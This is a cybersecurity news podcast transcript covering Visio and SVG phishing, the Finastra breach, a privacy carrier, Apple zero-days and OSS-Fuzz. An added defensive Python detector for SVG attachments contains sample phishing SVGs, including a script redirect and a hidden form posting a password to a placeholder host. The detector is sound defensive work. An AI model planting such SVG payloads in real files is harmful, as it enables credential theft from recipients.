Apple Patches Two Zero-Day Flaws Targeting Intel-Based Macs, American FinTech Giant Has 400GB Of Customer Data Stolen before hacker disappears, Beware of Two-Step Phishing and SVG Attachments, A New Secure Phone System Is Launched for High Risk Individuals and Google’s OSS Fuzz uncovers a Decades old bug in Open SSL.
This is Cyber Security Today. I’m your host, Jim Love.
Cybersecurity experts are warning of two emerging phishing attack strategies—two-step phishing (2SP) using Microsoft Visio files and scalable vector graphics (SVG) attachments. These tactics, designed to evade detection, exploit trust and human error to steal credentials and deploy malware.
Two-Step Phishing Attacks
Researchers from Perception Point highlight a surge in two-step phishing attacks that weaponize Microsoft Visio (.vsdx) files. Commonly used for data visualization, these files are now embedded with malicious URLs. The attack unfolds in layers:
- Victims receive a seemingly legitimate email containing a business proposal or purchase order.
- Clicking a URL leads to a compromised Microsoft SharePoint page hosting a Visio file.
- Inside the file, another clickable URL redirects victims to a fake Microsoft 365 login page designed to steal credentials.
A key tactic involves instructing victims to “hold down the Ctrl key and click,” a move designed to bypass automated security scanners. Robust two-factor authentication (2FA) is recommended to thwart such attacks.
SVG Attachments in Phishing
Threat actors are also leveraging SVG attachments, which can execute JavaScript or display credential-stealing forms. Unlike traditional raster image formats, SVG files are text that describes shapes mathematically, so malicious content inside them is harder for security software to detect.
- SVGs can mimic Excel spreadsheets or forms, tricking users into entering sensitive information.
- In some cases, JavaScript embedded in SVGs redirects users to malicious websites when the attachment is opened.
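The two SVG tricks described above (embedded JavaScript and embedded HTML forms) are both visible in the file's XML. The following triage helper, an added example and not part of the original report, flags the constructs an e-mail gateway or analyst would look for: script elements, event-handler attributes, `foreignObject` (which can embed an HTML form) and `href` links that execute or point off-host. The sample SVGs are constructed and the `example.invalid` hosts are placeholders.

```python
"""Triage helper for SVG e-mail attachments: flag active content.

Uses only the standard library. For untrusted input in production,
prefer the defusedxml package: the stdlib parser does not defend
against entity-expansion (billion laughs) attacks.
"""
import re
import xml.etree.ElementTree as ET

# Element names (lower-cased local names) that can run code or embed HTML.
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}
# href schemes that either execute, carry inline payloads, or load remote content.
RISKY_HREF = re.compile(r"^\s*(javascript:|data:|https?:)", re.IGNORECASE)


def _local(name: str) -> str:
    """Strip the XML namespace prefix ({uri}name -> name) and lower-case it."""
    return name.rsplit("}", 1)[-1].lower()


def flag_svg_active_content(svg_bytes: bytes) -> list[str]:
    """Return a list of findings; an empty list means no active content was seen."""
    findings = []
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        # A malformed attachment is itself a signal, not a reason to pass it.
        return [f"unparseable XML ({exc}); treat as suspicious"]
    for elem in root.iter():
        tag = _local(elem.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"<{tag}> element present")
        for attr, value in elem.attrib.items():
            name = _local(attr)
            if name.startswith("on"):  # onload, onclick, onmouseover, ...
                findings.append(f"event handler {name} on <{tag}>")
            elif name == "href" and RISKY_HREF.match(value):
                findings.append(f"<{tag}> href -> {value.split(':', 1)[0]}: link")
    return findings


# Constructed samples: a harmless icon, a script redirect, and a fake form.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <circle cx="5" cy="5" r="4" fill="blue"/></svg>"""
REDIRECT_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" onload="go()">
  <script>function go(){ window.location = 'https://example.invalid/login'; }</script></svg>"""
FORM_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <foreignObject width="300" height="200">
    <form xmlns="http://www.w3.org/1999/xhtml" action="https://example.invalid/post"><input name="pw"/></form>
  </foreignObject>
  <a xlink:href="https://example.invalid/login"><text x="10" y="20">Open spreadsheet</text></a></svg>"""

if __name__ == "__main__":
    for label, sample in [("benign", BENIGN_SVG), ("redirect", REDIRECT_SVG), ("form", FORM_SVG)]:
        print(label, flag_svg_active_content(sample) or "clean")
```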
Mitigation Strategies
Experts emphasize human vigilance as the first and last line of defense.
- For Visio-based attacks: Avoid following unexpected instructions like holding down the Ctrl key and clicking. Verify the sender and context of the email.
- For SVG attachments: Treat these files as suspicious, especially if they’re uncommon in your workflow. Verify the sender’s identity and intent before opening.
By combining these strategies with technical safeguards like two-factor authentication and robust email security, individuals and organizations can better protect against these sophisticated phishing campaigns.
Finastra Probes Data Breach After 400GB of Customer Data Stolen
Finastra, a global financial technology leader serving 45 of the world’s top 50 banks, is investigating a significant data breach involving its internal file transfer platform. Cybercriminals reportedly exfiltrated over 400GB of customer data, which has since been advertised for sale on dark web forums.
On November 7, Finastra’s security team detected suspicious activity, and the company immediately notified affected customers. In a statement, Finastra revealed that no malware was deployed and no files beyond the exfiltrated data were accessed. Investigations point to compromised credentials as the likely root cause.
A cybercriminal known as “abyss0” began selling the stolen data in late October, initially pricing it at $20,000 before reducing it to $10,000. The data includes sensitive information from Finastra’s major banking clients, though the cybercriminal’s subsequent disappearance has raised questions about the breach’s resolution.
Finastra has replaced the compromised platform with a secure alternative and is working to identify affected customers. The company’s Chief Information Security Officer (CISO) is actively engaging with client security teams and sharing Indicators of Compromise (IOCs) to prevent further incidents.
This breach comes after a ransomware attack in 2020 that disrupted Finastra’s operations but apparently did not result in a ransom payment.
The hacker abyss0 has apparently disappeared; their Telegram and BreachForums accounts have been closed.
Privacy-First Mobile Carrier Launches for High-Risk Users
A new privacy-focused telecom service, Cape, is launching today, offering public figures, executives, journalists, and activists a secure way to use mobile networks with minimal data collection. The service aims to address rising concerns over government surveillance and cyberattacks, particularly from state-sponsored actors.
Cape’s service, built on the U.S. Cellular network, uses proprietary software to limit user data collection. Unlike traditional carriers, Cape stores only essential subscriber information for 60 days and enables users to rotate identifiers like device and advertiser IDs on-demand. This makes it harder for apps and brokers to track and monetize user data.
Cape’s device, a standard Android phone with modified data settings, is optional. Customers can use their own phones and port their numbers, with updates handled via eSIM technology. CEO John Doyle, a former Palantir executive and U.S. Army special forces sergeant, explained that Cape tested its services with national security professionals, government officials, and privacy advocates to refine its offering.
While the service provides robust privacy protections, it comes at a high cost, with some plans reaching $1,000 monthly. Cape is working to make its service more affordable for groups like journalists and domestic violence survivors and plans to expand to the general public next year with competitive pricing.
Apple Patches Two Zero-Day Flaws Targeting Intel-Based Macs
Apple has released emergency updates to address two zero-day vulnerabilities affecting Intel-based Mac systems. The flaws, found in macOS Sequoia’s JavaScriptCore and WebKit components, were exploited in attacks, according to an advisory issued by the company on Tuesday.
- CVE-2024-44308 (JavaScriptCore): Allows remote code execution through maliciously crafted web content.
- CVE-2024-44309 (WebKit): Enables cross-site scripting (XSS) attacks.
Both vulnerabilities were discovered by Clément Lecigne and Benoît Sevens of Google’s Threat Analysis Group. While Apple has not disclosed how the exploits were used, it confirmed that the flaws have been addressed in macOS Sequoia 15.1.1, as well as in updates for iOS, iPadOS, and visionOS.
These fixes bring Apple’s total number of patched zero-days in 2024 to six, a marked improvement compared to 2023 when the company addressed 20 such vulnerabilities. Security researchers recommend users update their devices immediately to mitigate potential risks.
Google’s AI Tool OSS-Fuzz Uncovers Decades-Old Bug in OpenSSL
Google’s AI-powered fuzzing tool, OSS-Fuzz, has identified over 26 previously undetected vulnerabilities, including a critical flaw in the OpenSSL library (CVE-2024-9143). This bug, reportedly present for two decades, highlights the transformative potential of large language models (LLMs) in security research.
OSS-Fuzz uses fuzzing techniques—injecting random data into software—to uncover errors that traditional, human-driven fuzzing might miss. According to Google’s open source security team, this AI tool has discovered vulnerabilities in widely used software like OpenSSL and the cJSON project, demonstrating its ability to detect complex bugs that could evade human scrutiny.
Introduced in 2023, OSS-Fuzz has progressively automated more steps in the fuzzing process, now handling the first four phases of vulnerability detection, including drafting fuzz targets, resolving compilation issues, and triaging crashes. Google plans to further enhance the tool by enabling it to generate vulnerability patches, aiming for a fully automated workflow.
AI-driven tools like OSS-Fuzz are gaining traction across the industry. Google’s separate LLM-based tool, Big Sleep, recently found a memory-safety flaw, and Protect AI’s Vulnhuntr has uncovered zero-day vulnerabilities in Python projects. These advancements signal a shift in cybersecurity, as researchers increasingly rely on AI to preemptively address threats that may already be exploited by malicious actors.
Sources include: Google Blog Post, The Register.
That’s our show for today.
You can find links to reports and other details in our show notes at technewsday.com. We welcome your comments, tips and the occasional bit of constructive criticism at editorial@technewsday.ca
I’m your host, Jim Love, thanks for listening.